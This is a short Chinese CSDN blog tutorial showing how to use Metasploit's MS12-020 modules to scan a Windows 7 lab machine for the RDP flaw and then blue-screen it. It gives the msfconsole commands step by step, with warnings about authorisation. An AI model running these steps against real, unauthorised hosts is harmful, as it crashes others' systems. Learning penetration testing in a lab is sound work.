简单记一次用Metasploit搞坏自己电脑

本文详细介绍了如何通过Metasploit利用WindowsRDP远程桌面协议的MS12-020漏洞对Windows7系统进行渗透测试,包括扫描目标、使用exploit模块和验证漏洞利用成功的过程。
摘要由CSDN通过智能技术生成

注意:

一:请不要用自己电脑去尝试

二:请不要非法去入侵别人电脑

三:渗透测试是需要授权的!

正文:(这是一个很常见的漏洞

利用漏洞:MS12-020(死亡蓝屏)全称:-->Microsoft windows远程桌面协议RDP远程代码执行漏洞

粗暴地介绍:-->RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。

攻击者:Kali linux 2023.4

受害者: Windows 7

利用工具:Metasploit

影响范围:Windows xp 、2003、2008

过程:

首先:利用扫描工具扫描Windows 7的端口,接着如果看到了windows 7的开放端口中具有一个3389。恭喜恭喜。我们可以进行下一步的攻击啦!

然后:win+r打开“运行”后输入cmd,然后输入"msfconsole"键进入Metasploit控制台(首先你要安装Metasploit然后再把文件夹中的"bin"目录添加进环境变量“

再:输入search MS12-020(搜索有没有叫MS12-020的相关利用模块)

接下来可以看到:0:Auxiliary/scanner/rdp/ms12_020_maxchannelids MS120-020 Microsoft Remote Desktop Checker(检查有没有漏洞的)

1:Auxiliary/dos/windows/rdp/ms12_020_maxchannelids MS12-020 Microsoft Remote Desktop Use-After-Free DOS(攻击的)

接着:use 0(使用第一个)

set rhost(受害者IP)

再run

得到结果:The target is vulnerable(意味着受害者有这个漏洞可以利用)

最后(泪目,终于写到最后了):use 1(使用第二个)

set rhost(受害者IP)

Exploit

结果:如果看到后面有:IP地址:3389   -  IP地址 seems down

OK! 受害者成功受害!

肯定被打蓝屏了!
最后:
祝大家学习顺利
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值